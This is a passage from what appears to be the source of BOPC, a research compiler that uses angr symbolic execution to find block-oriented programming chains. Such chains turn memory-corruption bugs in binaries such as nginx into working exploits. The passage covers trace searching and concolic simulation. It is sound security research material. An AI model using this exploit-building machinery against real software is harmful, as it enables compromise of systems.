statement(s) that don't have accepted blocks, discard mapping\n        if not accblks:\n            dbg_prnt(DBG_LVL_1, 'There are not enough accepted blocks. Discard mapping...')\n            return 0                                # try another mapping\n\n\n\n        # if there are enough accepted blocks, go back to the CFG and mark clobbering blocks\n        cloblks = self.__mark.mark_clobbering( regmap, varmap )\n\n        # At this point you can visualize the CFG\n        #\n        # visualize('cfg_test', entry=self.__entry,\n        #     options=VO_DRAW_CFG | VO_DRAW_CLOBBERING | VO_DRAW_ACCEPTED | VO_DRAW_CANDIDATE)\n\n\n        # add entry point to accblks (with min uid) to avoid special cases\n        accblks[ START_PC ] = [self.__entry]\n\n\n        # also add SPL's return address as an acceptd block\n        for stmt in self.__IR:                      # return is the last statement in IR\n            if stmt['type'] == 'return':\n\n                # check that target address is a valid address of a basic block \n                if stmt['target'] != -1 and stmt['target'] not in ADDR2NODE:\n                    fatal(\"Return address '0x%x' not found\" % stmt['target'])\n\n                accblks[ stmt['uid'] ] = [ stmt['target'] ]\n\n\n        # ---------------------------------------------------------------------\n        # Pretty-print the accepted and clobbering blocks\n        # --------------------------------------------------------------------- \n        dbg_prnt(DBG_LVL_2, 'Accepted block set (uid/block):')\n\n        for a,b in sorted(accblks.iteritems()):\n            dbg_prnt(DBG_LVL_2, '\\t%s: %s' % (bold(a, pad=3), ', '.join(['0x%x' % x for x in b])))\n\n\n        dbg_prnt(DBG_LVL_3, 'Clobbering block set (uid/block):')\n\n        for a,b in sorted(cloblks.iteritems()):\n            dbg_prnt(DBG_LVL_3, '\\t%s: %s' % (bold(a, pad=3), ', '.join(['0x%x' % x for x in b])))\n\n\n        # ---------------------------------------------------------------------\n        # Shuflle statements and build the Delta Graph\n        # ---------------------------------------------------------------------\n        dbg_prnt(DBG_LVL_1, \"Shuffling SPL payload...\")\n\n        for perm in self.__shuffle(accblks):        # start shuffling IR\n\n            dbg_arb(DBG_LVL_1, 'Statement order:', perm)\n\n\n            # build the adjacency list for that order\n            adj = self.__mk_adjacency_list(perm)\n            self.__adj = adj\n            # remove goto statements as they are problematic\n            adj, rm = self.__remove_goto(accblks, adj)\n\n            perm = filter(lambda x : x not in rm, perm)\n            perm = [(y, accblks[y]) for y in perm]\n\n            dbg_arb(DBG_LVL_3, \"Updated SPL statement adjacency list\", adj)\n            \n\n            # create the Delta Graph for the given permutation        \n            DG = D.delta(self.__cfg, self.__entry, perm, cloblks, adj)          \n            \n\n            # visualise delta graph\n            #\n            # visualize(DG.graph, VO_TYPE_DELTA)\n            # exit()\n   \n       \n\n            # select the K minimum induced subgraphs Hk from the Delta Graph\n            # Hk = a subset of accepted blocks that reconstruct the execution of the SPL payload) \n            for size, Hk in DG.k_min_induced_subgraphs( PARAMETER_K ): \n                if size < 0:                        # Delta Graph disconnected?\n                    dbg_prnt(DBG_LVL_1, \"Delta Graph is disconnected.\")\n                    break                           # try another permutation (or mapping)\n                \n                # Paths that are too long should be discarded as it's unlikely to find a trace\n                if size > MAX_ALLOWED_TRACE_SIZE:\n                    dbg_prnt(DBG_LVL_1, \"Subgraph size is too long (%d > %d). Discard it.\" % \n                                                    (size, MAX_ALLOWED_TRACE_SIZE))\n                    break                           # try another permutation (or mapping)\n\n                         \n                # subgraph is ok. Flatten it and make it a \"tree\", to easily process it\n                tree, pretty_tree = DG.flatten_graph(Hk)                \n\n                emph('Flattened subgraph (size %d): %s' % (size, bolds(str(pretty_tree))), DBG_LVL_2)\n                \n\n                # TODO: this check will discard \"trivial\" solutions (all in 1 block)\n                if size == 0:\n                    warn('Delta graph found but it has size 0' )\n                    # continue\n\n\n                # enumerate all paths, and fork accordingly\n\n\n                # Symbolic execution used?\n                self.__options['simulate'] = True\n\n\n                # visualise delta graph with Hk (induced subgraph) \n                #      visualize(DG.graph, VO_TYPE_DELTA)\n                #        exit()\n\n                #\n                # TODO: In case of conditional jump, we'll have multiple \"final\" states.\n                # We should check whether those states have conflicting constraints.\n                #\n                dbg_prnt(DBG_LVL_2, \"Enumerating Tree...\")\n\n                self.__simstash = []\n\n\n                # -------------------------------------------------------------\n                # Easter Egg: When entry point is -1, we skip it and we directly\n                # start from the next statement\n                # -------------------------------------------------------------\n                if self.__entry == -1:\n\n                    if not isinstance(tree[0], tuple):\n                        fatal('First statement is a conditional jump.')\n\n                    # drop first transition (from entry to the 1st statement) and start\n                    # directly from the 1st statement. There is no entry point.\n                    # \n                    # also update the entry point\n                    _, _, entry = tree.pop(0)\n\n                    pretty_tree.pop(0)\n\n                    emph(\"Easter Egg found! Skipping entry point\")\n\n                    emph('New flattened subgraph: %s' % bolds(str(pretty_tree)), DBG_LVL_1)\n             \n                else:\n                    entry = self.__entry            # use the regular entry point\n\n\n                try:\n                    # create the simulation object\n                    simulation = S.simulate(self.__proj, self.__cfg, cloblks, adj, self.__IR,\n                                            regmap, varmap, rsvp, entry)\n                except Exception, e:\n                    dbg_prnt(DBG_LVL_2, \"Cannot create simulation object. Discard current Hk\")\n                    continue\n\n\n                self.__sim_objs = [simulation]\n                self.__terminals = [tree[0][1]]\n\n                self.__total_path = set()\n                self.__path = set()\n                retn = self.__enum_tree( tree, simulation )\n\n                # del simulation                \n\n                dbg_prnt(DBG_LVL_2, \"Done. Enumeration finished with exit code %s\" % bold(retn))\n\n             \n                # visualize(self.__cfg.graph, VO_TYPE_CFG, \n                #           options=VO_CFG | VO_ACC | VO_CLOB | VO_PATHS,\n                #           func=self.__proj.kb.functions[0x41C750], entry=0x41C750, \n                #           paths=self.__total_path)\n                # exit()\n\n\n                if retn == 0 and self.__consistent_stashes():            \n                    self.__nsolutions += 1\n                    self.__options['#solutions'] = self.__nsolutions\n\n\n                    # # visualise delta graph with Hk\n                    #\n                    # visualize(DG.graph, VO_TYPE_DELTA, options=VO_PATHS | VO_DRAW_INF_EDGES,\n                    #           paths=self.__path)\n                    # exit()\n\n\n                    # # visualize CFG again\n                    # visualize(self.__cfg.graph, VO_TYPE_CFG, \n                    #           options=VO_CFG | VO_ACC | VO_CLOB | VO_PATHS,\n                    #           func=self.__proj.kb.functions[0x444A9D], entry=0x444A9D, \n                    #           paths=self.__total_path)\n                    # exit()\n\n                    print rainbow(textwrap.dedent('''\\n\\n\n                            $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $\n                            $                                                                     $\n                            $                 *** S O L U T I O N   F O U N D ***                 $\n                            $                                                                     $\n                            $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $\n                            '''))\n\n\n                    emph(bolds('Solution #%d' % self.__nsolutions))\n                    emph('Final Trace: %s' % bolds(str(pretty_tree)))\n\n                    output = O.output( self.__options['format'] )\n                    \n\n                    output.comment('Solution #%d' % self.__nsolutions)\n                    output.comment('Mapping #%d' % self.__ctr)\n                    output.comment('Registers: %s' % ' | '.join(['%s <-> %s' % (virt, real) for virt, real in regmap]))\n                    output.comment('Variables: %s' % ' | '.join(['%s <-> %s' % (var, hex(val) if isinstance(val, long) else str(val)) for var, val in varmap]))\n     \n                    output.comment('')\n                    output.comment('Simulated Trace: %s' % pretty_tree)\n                    output.comment('')\n\n                    output.newline()\n\n                    # cast it to a set to drop duplicates\n                    for addr in set(self.__terminals):\n                        output.breakpoint(addr)\n\n                    output.newline()\n                    output.comment('Entry point')\n                    output.set('$pc', '0x%x' %  entry)\n                    output.newline()\n\n                    # for each active stash, dump all the solutions\n                    for simulation in self.__simstash:\n                        simulation.dump( output )\n\n                    emph(bolds('BOPC is now happy :)'))\n\n                    output.save(self.__options['filename'])                    \n            \n                    # save state\n                    if self.__options['solutions'] == 'one':                  \n\n                        for obj in self.__sim_objs: # free memory\n                            del obj\n\n                        return -1                   # we have a solution. No more mappings\n\n\n                for obj in self.__sim_objs: # free memory\n                    del obj\n\n            del DG\n\n        return 0                                    # try another mapping...      \n\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                                     CLASS INTERFACE                                     '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __init__(): Class constructor. Simply initialize private members\n    #\n    # :Arg project: Instance of angr project\n    # :Arg cfg: Binary's CFG\n    # :Arg IR: SPL's Intermediate Representation (IR)\n    # :Arg entry: Binary's entry point\n    # :Arg options: Addtional options needed for the trace searching\n    #\n    def __init__( self, project, cfg, IR, entry, options ):\n        self.__proj    = project                    # store arguments internally\n        self.__cfg     = cfg\n        self.__IR      = IR\n        self.__entry   = entry\n        self.__options = options\n\n        self.__reg   = { }\n        self.__mem   = { }\n        self.__ext   = { }       \n\n        self.__solved     = False\n        self.__nsolutions = 0\n\n        # make sure that the upper bound is valid\n        assert(N_OUT_OF_ORDER_ATTEMPTS > 0 or N_OUT_OF_ORDER_ATTEMPTS == -1)\n              \n\n\n    # ---------------------------------------------------------------------------------------------\n    # trace_searching(): Build a trace that cnnects all functional blocks.\n    #\n    # :Arg mark: A graph marking object\n    # :Arg \n    # :Ret: If function can successfully find trace, function returns True. Otherwise it returns\n    #       False.\n    #\n    def trace_searching( self, mark ):\n        dbg_prnt(DBG_LVL_1, \"Trace searching algorithm started.\")\n\n        self.__mark = mark                          # store object internally\n        self.__ctr  = 0                             # clear mapping counter\n\n\n        # create a mapping object\n        mapping = M.map(mark.map_graph, self.__IR.nregs, self.__IR.nregvars)\n\n        # enumerate all possible register and variable mappings\n        rval = mapping.enum_mappings( self.__mapping_callback )\n\n        dbg_prnt(DBG_LVL_1, \"Trace searching algorithm finished with exit code %s\" % bold(rval))\n        \n        return rval\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # raw_results(): \n    #\n    def raw_results( self ):\n\n        if not self.__solved:\n            raise Exception('There is no trace!')\n\n        return self.__reg, self.__mem, self.__ext\n\n\n\n# -------------------------------------------------------------------------------------------------\n"
  },
  {
    "path": "source/simulate.py",
    "content": "#!/usr/bin/env python2\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\n#\n#\n# simulate.py:\n#\n# This module performs the concolic execution. That is it verifies a solution proposed by search\n# module. For more details please refer to the paper.\n#\n#\n# * * * ---===== TODO list =====--- * * *\n#\n#   [1]. Consider overlapping cases. For instance, when we write e.g., 8 bytes at address X and\n#        then we write 4 bytes at address X+1, we may have issues\n#\n#\n# -------------------------------------------------------------------------------------------------\nfrom coreutils import *\nimport path\n\nimport angr\nimport archinfo\nimport struct\nimport signal\nimport copy\nimport time\n\n\n\n# ------------------------------------------------------------------------------------------------\n# Constant Definitions\n# ------------------------------------------------------------------------------------------------\n\n# WARNING: In case that relative addresses fail, adjust them.\n# TODO: Add command line options for them.\nMAX_MEM_UNIT_BYTES      = 8                         # max. memory unit size (for x64 is 8 bytes)\nMAX_MEM_UNIT_BITS       = MAX_MEM_UNIT_BYTES << 3   # max. memory unit size in bits\n\nALLOCATOR_BASE_ADDR     = 0xd8000000                # the base address of the allocator\nALLOCATOR_GRANULARITY   = 0x1000                    # the allocation size\nALLOCATOR_CEIL_ADDR     = 0xd9000000                # the upper bound of the allocator\nALLOCATOR_NAME          = '$alloca'\n                          \nPOOLVAR_BASE_ADDR       = 0xca000000                # the base address of the pool\nPOOLVAR_GRANULARITY     = 0x1000                    # (safe) offset between pools\nPOOLVAR_NAME            = '$pool'\n\nSIM_MODE_INVALID        = 0xffff                    # invalid simulation mode\nSIM_MODE_FUNCTIONAL     = 0x0001                    # simulation mode: Functional\nSIM_MODE_DISPATCH       = 0x0000                    # simulation mode: Dispath\n\nMAX_BOUND = 0x4000\n\n\n# addresses that are not recognized as R/W but they are\n_whitelist_ = [\n    0x2010028,                                      # fs:0x28\n    0xc0000000,                                     # __errno_location\n    0xc0000070                                      # fopen() internal\n]\n\n\n# ALLOCATOR_BASE_ADDR     = 0x686180                # the base address of the allocator\n# ALLOCATOR_CEIL_ADDR     = 0x686180+0x10000        # the upper bound of the allocator\n# POOLVAR_BASE_ADDR       = 0x680040                # the base address of the pool\n# MAX_BOUND = 0x400\n\nEXTERNAL_UNINITIALIZED = -1\n\n# -------------------------------------------------------------------------------------------------\n# simulate: This class simulates the execution between a pair of accepted blocks\n#\nclass simulate:\n    ''' ======================================================================================= '''\n    '''                             INTERNAL FUNCTIONS - AUXILIARY                              '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __sig_handler(): Symbolic execution may take forever to complete. To deal with it, we set\n    #       an alarm. When the alarm is triggered, this singal handler is invoked and throws an\n    #       exception that causes the symbolic execution to halt.\n    #\n    # :Arg signum: Signal number\n    # :Arg frame: Current stack frame\n    # :Ret: None.\n    #\n    def __sig_handler( self, signum, frame ):        \n        if signum == signal.SIGALRM:                # we only care about SIGALRM\n\n            # angr may ignore the exception, so let's throw many of them :P\n            raise Exception(\"Alarm triggered after %d seconds\" % SE_TRACE_TIMEOUT)\n            raise Exception(\"Alarm triggered after %d seconds\" % SE_TRACE_TIMEOUT)\n            raise Exception(\"Alarm triggered after %d seconds\" % SE_TRACE_TIMEOUT)\n            raise Exception(\"Alarm triggered after %d seconds\" % SE_TRACE_TIMEOUT)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __in_constraints(): This function checks whether a symbolic variable is part of the\n    #       constraints.\n    #\n    # :Arg symv: The symbolic variable to check\n    # :Arg state: Current state of the symbolic execution    \n    # :Ret: If symv is in constraints, function returns True. Otherwise it returns False.\n    #\n    def __in_constraints( self, symv, state=None ):\n        if not state:                               # if no state is given, use the current one\n            state = self.__state\n\n\n        # drop the \"uninitialized\" thing from everywhere\n        symvstr = symv.shallow_repr().replace(\"{UNINITIALIZED}\", \"\")\n\n        # We may have this in the constraints: \n        #   <Bool Reverse(mem_801_64[7:0] .. Reverse(mem_801_64)[55:0]) != 0x0>\n        #\n        # But symvstr is:\n        #   <BV64 Reverse(mem_801_64[7:0] .. Reverse(mem_801_64)[55:0])>  \n        #\n        # A quick fix is to drop the type:\n        \n        symvstr2 = symvstr[symvstr.find(' '):-1]\n   \n        # print 'symvstr2', symvstr2\n\n        # this is the old style check \n        if symvstr2 in ' '.join([c.shallow_repr().replace(\"{UNINITIALIZED}\", \"\") \\\n                                    for c in state.se.constraints]):\n            return True\n\n        \n        # reinforce function with a stronger check\n        for constraint in state.se.constraints:\n        # print 'CONTRST', constraint\n\n            try:\n                # treat constraint as an AST and iterate over its leaves\n                for leaf in constraint.recursive_leaf_asts:\n                # print '\\tLEAF', symv, symvstr, leaf, leaf.shallow_repr().replace(\"{UNINITIALIZED}\", \"\")\n\n                    # we can't compare them directly, so we cast them into strings first\n                    # (not a very \"clean\" way to do that, but it works)\n                    if leaf.shallow_repr().replace(\"{UNINITIALIZED}\", \"\") == symvstr:\n                        return True                 # symbolic variable found!\n\n            except Exception, err:\n                # fatal('__in_constraints() unexpected exception: %s' % str(err))\n                pass\n\n        return False                                # symbolic variable not found\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __getreg(): Get the symbolic value of a register that has in the current state.\n    #\n    # :Arg reg: The name of the register\n    # :Arg state: Current state of the symbolic execution\n    # :Ret: The symbolic value for that register.\n    #\n    def __getreg( self, reg, state=None ):\n        if not state:                               # if no state is given, use the current one\n            state = self.__state\n\n        try:\n            return {    \n                'rax' : state.regs.rax,\n                'rbx' : state.regs.rbx,\n                'rcx' : state.regs.rcx,\n                'rdx' : state.regs.rdx,\n                'rsi' : state.regs.rsi,\n                'rdi' : state.regs.rdi,\n                'rbp' : state.regs.rbp,\n                'rsp' : state.regs.rsp,\n                'r8'  : state.regs.r8,\n                'r08' : state.regs.r8,\n                'r9'  : state.regs.r9,\n                'r09' : state.regs.r9,\n                'r10' : state.regs.r10,\n                'r11' : state.regs.r11,\n                'r12' : state.regs.r12,\n                'r13' : state.regs.r13,\n                'r14' : state.regs.r14,\n                'r15' : state.regs.r15,\n            }[ reg ]\n        except KeyError:\n            fatal(\"Unknow register '%s'\" % reg)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __mread(): This function reads from memory. The problem here is that we have to explicitly\n    #       specify how to interpret memory (.uint8_t, .uint32_t, etc.), according to the number\n    #       of bytes that we want to read. This results in cumbersome code, as we need a different\n    #       case for every possible length, so we provide a simply interface through this function.\n    #\n    # :Arg state: Current state of the symbolic execution\n    # :Arg addr: Address to read from\n    # :Arg length: Number of bytes to read\n    # :Ret: The contents of the desired memory \"area\".\n    #\n    def __mread( self, state, addr, length ):\n       # dbg_prnt(DBG_LVL_3, \"Reading %d bytes from 0x%x\" % (length, addr))\n\n        return state.memory.load(addr, length, endness=archinfo.Endness.LE)\n\n        '''\n        try:\n            return {\n                1 : state.mem[ addr ].uint8_t.resolved,\n                2 : state.mem[ addr ].uint16_t.resolved,\n                4 : state.mem[ addr ].uint32_t.resolved,\n                8 : state.mem[ addr ].uint64_t.resolved\n            }[ length ]\n        except KeyError:\n            dbg_prnt(DBG_LVL_3, \"Reading %d bytes from 0x%x\" % (length, addr))\n\n            return state.memory.load(addr, length)  # for other sizes, just use load() \n        '''\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __mwrite(): Similar to __mread() but this function writes to memory instead.\n    #\n    # :Arg state: Current state of the symbolic execution\n    # :Arg addr: Address to write to\n    # :Arg length: Number of bytes to write\n    # :Ret: None.\n    #\n    def __mwrite( self, state, addr, length, value ):\n        state.memory.store(addr, value, length, endness=archinfo.Endness.LE)\n\n        '''        \n        if   length == 1: state.mem[addr].uint8_t  = value\n        elif length == 2: state.mem[addr].uint16_t = value\n        elif length == 4: state.mem[addr].uint32_t = value\n        elif length == 8: state.mem[addr].uint64_t = value\n        else:\n            dbg_prnt(DBG_LVL_3, \"Writing %d bytes to 0x%x\" % (length, addr))\n\n            state.memory.store(addr, value, length)\n        '''\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __get_permissions(): Get \n    #\n    # :Arg state: Current state of the symbolic execution\n    # :Arg addr: Address to write to\n    # :Arg length: Number of bytes to write\n    # :Ret: None.\n    #\n    def __get_permissions( self, addr, length=1, state=None ):\n        if not state:                               # if no state is given, use the current one\n            state = self.__state\n\n        # TODO: check permissions for addr+1, addr+2, ... addr+length-1\n        #warn('POOL UPPER BOUND %x' % (POOLVAR_BASE_ADDR + self.__plsz))\n\n        # special cases first\n        if addr < 0x10000:\n            return ''\n\n        elif ALLOCATOR_BASE_ADDR <= addr and addr <= ALLOCATOR_CEIL_ADDR:\n            return 'RW'   \n\n        # TOOD:!!! 0x10000\n        elif POOLVAR_BASE_ADDR <= addr and addr <= POOLVAR_BASE_ADDR + self.__plsz + 0x1000:\n            return 'RW'\n\n        # special case when a stack address is in the next page\n        # TODO: make it relative from STACK_BASE_ADDR\n        elif addr & 0x07ffffffffff0000 == 0x07ffffffffff0000:\n            return 'RW'\n\n\n        try:                    \n            for _, sec in  self.__proj.loader.main_object.sections_map.iteritems():\n                if sec.contains_addr(addr):                    \n                    return ('R' if sec.is_readable   else '') + \\\n                           ('W' if sec.is_writable   else '') + \\\n                           ('X' if sec.is_executable else '')\n\n            permissions = state.se.eval(state.memory.permissions(addr))\n\n            return ('R' if permissions & 4 else '') + \\\n                   ('W' if permissions & 2 else '') + \\\n                   ('X' if permissions & 1 else '')\n\n        except angr.errors.SimMemoryError:       \n            return ''                               # no permissions at all\n \n\n\n    # ---------------------------------------------------------------------------------------------\n    # __symv_in(): Check whether a symbolic expression contains a given symbolic variable.\n    #\n    # :Arg symexpr: The symblolic expression\n    # :Arg symv: The symbolic variable to look for\n    # :Ret: If symexpr contains symv, function returns True. Otherwise it returns False.\n    #\n    def __symv_in( self, symexpr, symv ):\n        if symexpr == None or symv == None:         # check special cases\n            return False\n            \n#        if symexpr.shallow_repr() == symv.shallow_repr(): \n#            return True\n        \n        try:\n            # treat symexpr as an AST and iterate over its leaves\n            for leaf in symexpr.recursive_leaf_asts:\n                \n                # we can't compare them directly, so we cast them into strings first\n                # (not a very \"clean\" way to do that, but it works)\n                if leaf.shallow_repr() == symv.shallow_repr():  \n                    return True                     # variable found!\n\n            return False                            # variable not found\n\n        except Exception, err:\n            # This --> BOPC.py -ddd -b eval/nginx/nginx1 -s payloads/ifelse.spl -a load -f gdb -e -1\n            # fatal('__symv_in() unexpected exception: %s' % str(err))\n\n            raise Exception('__symv_in() unexpected exception: %s' % str(err))\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __alloc_un(): \"Allocate\" memory for uninitialized symbolic variables (if needed).\n    #\n    # :Arg state: Current symbolic state of the execution\n    # :Arg symv: The symbolic variable \n    # :Ret: If symv is uninitialized, function returns True; otherwise it returns False.\n    #\n    def __alloc_un( self, state, symv ):\n        if symv == None:                            # make sure that variable is valid  \n            return False\n\n        # This code works fine for single variables but not for expressions:\n        #\n        # # nothing to do when variable is not uninitialized (i.e. initialized)\n        # if \"{UNINITIALIZED}\" not in symv.shallow_repr():\n        #     return False\n        #\n        # # After calling __alloc_un(), a variable will still have the UNINITIALIZED keyword\n        # # even though, it has a single solution. Avoid initializing a variable twice.\n        #\n        # con = state.se.eval_upto(symv, 2)           # try to get 2 solutions\n        # addr = state.se.eval(con[0])\n        #\n        # if len(con) > 1 or not (addr >= ALLOCATOR_BASE_ADDR and addr <= ALLOCATOR_CEIL_ADDR):\n        #     # initialize variable\n        addr = state.se.eval(symv)                  # try to concretize it\n\n\n        #  print '***** ALLOC UN:', hex(addr), symv\n\n        # we say < 0x1000, to catch cases with small offsets:\n        # e.g., *<BV64 Reverse(stack_16660_262144[258239:258176]) + 0x68>\n        # which gets concretized to 0x68 \n        if addr < 0x1000 or addr > 0xfffffffffffff000:\n        # if addr == 0: # < ALLOCATOR_BASE_ADDR or addr > ALLOCATOR_CEIL_ADDR\n\n            alloca = ALLOCATOR_BASE_ADDR + self.__alloc_size\n\n            # add the right contraint, to make variable, point where you want\n            # address now becomes concrete (it has exactly 1 solution)\n\n            # in case that addr > 0, make sure that symv is concretized from 0\n            # (otherwise, we'll start before self.__alloc_size)\n            x = state.se.BVS('x', 64)\n            # print 'x is ', x, alloca + addr, symv\n\n            # this indirection ensure that symv concretized to 64 bits\n            state.add_constraints(x == alloca + addr)\n            state.add_constraints(symv == x)\n\n            # \n            # print '-->', symv, 'goes to ', hex(alloca + addr)\n\n            self.__relative[alloca] = '%s + 0x%03x' % (ALLOCATOR_NAME, self.__alloc_size)\n\n            \n            self.__sym[ alloca ] = symv\n\n            # shift allocator\n            self.__alloc_size += ALLOCATOR_GRANULARITY\n\n            \n            return True                             # we had an allocation            \n        \n        return False                                # no allocation\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __init_mem(): This function initializes (if needed) a memory cell. When we start execution\n    #       from an arbitrary point, it's likely that the memory cell will be empty/uninitialized.\n    #       Therefore, we need to assign a symbolic variable to it first.\n    #\n    #       A special case here is global variables from .bss and .data, which have a default value\n    #       of 0. Therefore, these variables are actually uninitialized, but instead of containing\n    #       a symbolic variable, they contain the default value (a bitvector of value 0). However,\n    #       this can cause problems to the symbolic execution, as variables are already concrete.\n    #\n    # :Arg state: Current symbolic state of the execution\n    # :Arg addr: Address of the variable\n    # :Arg length: Length of the variable\n    # :Ret: If memory was initialized, function returns True. Otherwise it returns False.\n    #\n    def __init_mem( self, state, addr, length=MAX_MEM_UNIT_BYTES ):\n        if addr in self.__mem:                      # memory cell is already initialized\n            return False\n        \n        self.__mem[addr] = length                   # simply mark used addresses\n\n        # get ELF sections that give default values to their uninitialized variables\n        bss  = self.__proj.loader.main_object.sections_map[\".bss\"]\n        data = self.__proj.loader.main_object.sections_map[\".data\"]\n\n        # print 'INIT MEMORY', hex(addr), self.__mread(state, addr, length)\n\n\n        # if the memory cell is empty (None) or if the cell is initialized with a\n        # default value, then we should give it a symbolic variable. You can also use: \n        #       state.inspect.mem_read_expr == None:\n        #\n        if  self.__mread(state, addr, length) == None             or \\\n            bss.min_addr        <= addr and addr <= bss.max_addr  or \\\n            data.min_addr       <= addr and addr <= data.max_addr or \\\n            ALLOCATOR_BASE_ADDR <= addr and addr <= ALLOCATOR_CEIL_ADDR:\n            # bss.min_addr  <= addr and addr + length <= bss.max_addr  or \\\n            # data.min_addr <= addr and addr + length <= data.max_addr:\n\n                # Alternative: state.memory.make_symbolic('mem', addr, length << 3) (big endian)\n                symv = state.se.BVS(\"mem_%x\" % addr, length << 3)\n\n\n                # write symbolic variable to both states (current and original)\n                self.__mwrite(state,         addr, length, symv)\n                self.__mwrite(self.__origst, addr, length, symv)\n\n                # get symbolic variable\n                self.__sym[ addr ] = self.__mread(state, addr, length)\n\n                return True                         # memory initialized\n\n\n        # if it's uninitialized, simply add it variable to the __sym table\n        # (but memory is not initialized at all)\n        if \"{UNINITIALIZED}\" in self.__mread(state, addr, length).shallow_repr():\n            self.__sym[ addr ] = self.__mread(state, addr, length)            \n\n\n\n        return False                                # memory not initialized\n\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                          INTERNAL FUNCTIONS - EXECUTION HOOKS                           '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __dbg_read_hook(): This callback function is invoked when a memory \"area\" is being read.\n    #\n    # :Arg state: Current state of the symbolic execution\n    # :Ret: None.\n    #\n    def __dbg_read_hook( self, state ):\n        if self.__disable_hooks:                    # if hooks are disabled, abort\n            return\n\n        # if you read/write memory inside the hook, this operation will trigger __dbg_read_hook()\n        # again, thus resulting in a endless recursion. We need \"exclusive access\" here, so we\n        # disable hooks inside function's body. This is pretty much like a mutex.\n        self.__disable_hooks = True\n\n        # TODO: the idea of simulation modes is not perfect\n        #   a block can modify the data unintentionally\n        #\n        # update simulation mode\n\n#        if self.__blk_start <= state.addr and state.addr < self.__blk_end:\n#            self.__sim_mode = SIM_MODE_FUNCTIONAL\n#        else:\n#            self.__sim_mode = SIM_MODE_DISPATCH\n\n        print 'state.inspect.mem_read_address', state.inspect.mem_read_address\n\n\n        # if the address is an uninitialized symbolic variable, it can point to any location,\n        # thus, when it's being evaluated it gets a value of 0. To fix this, we \"allocate\" some\n        # memory and we make the address point to it.\n        self.__alloc_un(state, state.inspect.mem_read_address)\n\n        # now you can safely, \"evaluate\" address and concretize it\n        addr = state.se.eval(state.inspect.mem_read_address)\n\n        # concretize size (newer versions of angr never set state.inspect.mem_read_length to None)\n        if state.inspect.mem_read_length == None:\n            size = MAX_MEM_UNIT_BYTES               # if size is None, set it to default\n        else:\n            size = state.se.eval(state.inspect.mem_read_length)\n\n\n        self.__init_mem(state, addr, size)          # initialize memory (if needed)\n        \n\n        if state.inspect.instruction:\n            insn_addr = state.inspect.instruction\n        else:\n            insn_addr = state.addr\n\n        dbg_prnt(DBG_LVL_3, '\\t0x%08x: mem[0x%x] = %s (%x bytes)' % \n                    (insn_addr, addr, self.__mread(state, addr, size), size), pre='[R] ')\n        \n\n        # make sure that the address that you read from has +R permissions\n        # TODO: fs:0x28 (canary hits an error here) 0x2010028\n        if 'R' not in self.__get_permissions(addr, state) and addr not in _whitelist_:\n            raise Exception(\"Attempted to read from an non-readable address '0x%x'\" % addr)\n\n\n        self.__disable_hooks = False                # release \"lock\" (i.e., enable hooks again)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __dbg_write_hook(): This callback function is invoked when a memory \"area\" is being written.\n    #\n    # :Arg state: Current state of the symbolic execution\n    # :Ret: None.\n    #\n    def __dbg_write_hook( self, state ):\n        if self.__disable_hooks:                    # if hooks are disabled, abort\n            return\n        \n        # as in __dbg_read_hook(), we need mutual exclusion here as well\n        self.__disable_hooks = True\n\n\n        # update simulation mode\n#        if self.__blk_start <= state.addr and state.addr < self.__blk_end:\n#            self.__sim_mode = SIM_MODE_FUNCTIONAL\n#        else:\n#            self.__sim_mode = SIM_MODE_DISPATCH\n\n        if state.inspect.instruction:\n            insn_addr = state.inspect.instruction\n        else:\n            insn_addr = state.addr\n\n\n        # as in __dbg_read_hook(), fix uninitialized addresses first\n        self.__alloc_un(state, state.inspect.mem_write_address)\n\n        # now you can safely, \"evaluate\" address and concretize it\n        addr = state.se.eval(state.inspect.mem_write_address)\n\n        # concretize size (newer versions of angr never set state.inspect.mem_read_length to None)\n        if state.inspect.mem_write_length == None:\n            size = MAX_MEM_UNIT_BYTES               # if size is None, set it to default\n        else:\n            size = state.se.eval(state.inspect.mem_write_length)\n        \n\n        dbg_prnt(DBG_LVL_3, '\\t0x%08x: mem[0x%x] = %s (%x bytes)' % \n                    (insn_addr, addr, state.inspect.mem_write_expr, size), pre='[W] ')\n        \n\n#        print 'BEFORE', self.__mread(state, addr, size),  state.inspect.mem_write_expr\n#        ISPO = state.inspect.mem_write_expr\n        \n\n        if 'W' not in 